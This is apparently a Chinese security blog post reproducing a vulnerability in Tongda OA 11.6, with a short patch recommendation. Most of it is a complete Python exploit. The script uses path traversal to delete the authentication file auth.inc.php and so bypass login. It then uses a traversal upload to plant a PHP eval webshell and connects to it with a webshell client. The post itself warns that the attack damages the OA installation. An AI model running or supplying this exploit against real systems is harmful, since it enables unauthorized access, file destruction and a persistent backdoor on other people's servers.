- A+
所属分类:漏洞复现
0x01 影响环境
|
1 |
通达OA11.6 |
0x02 漏洞复现
下载地址:
|
1 2 |
链接:https://pan.baidu.com/s/1pzBGcp6XSIOGQZSg1buzMg 提取码:ctjc |
exp
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
import requests target="http://192.168.1.100:9999" # 修改url参数 payload="<?php eval($_POST['3838']);?>" # 一句话木马 print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA") input("Press enter to continue") print("[*]Deleting auth.inc.php....") url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php" requests.get(url=url) print("[*]Checking if file deleted...") url=target+"/inc/auth.inc.php" page=requests.get(url=url).text if 'No input file specified.' not in page: print("[-]Failed to deleted auth.inc.php") exit(-1) print("[+]Successfully deleted auth.inc.php!") print("[*]Uploading payload...") url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./" files = {'FILE1': ('dadada.php', payload)} requests.post(url=url,files=files) url=target+"/_dadada.php" page=requests.get(url=url).text if 'No input file specified.' not in page: print("[+]Filed Uploaded Successfully") print("[+]URL:",url) else: print("[-]Failed to upload file") |
攻击效果
|
1 |
python tongda.py |
菜刀连接
0x03 注意
该EXP会删除OA所需要的php文件来绕过验证,因此攻击不是无损的,在使用该漏洞时慎重慎重!!
0x04 修复建议
官方已经发布V11.7新版本,请受影响的用户更新到最新版本:
|
1 |
https://www.tongda2000.com/download/sp2019.php |
- 我的微信
- 这是我的微信扫一扫
-
- 我的微信公众号
- 我的微信公众号扫一扫
-
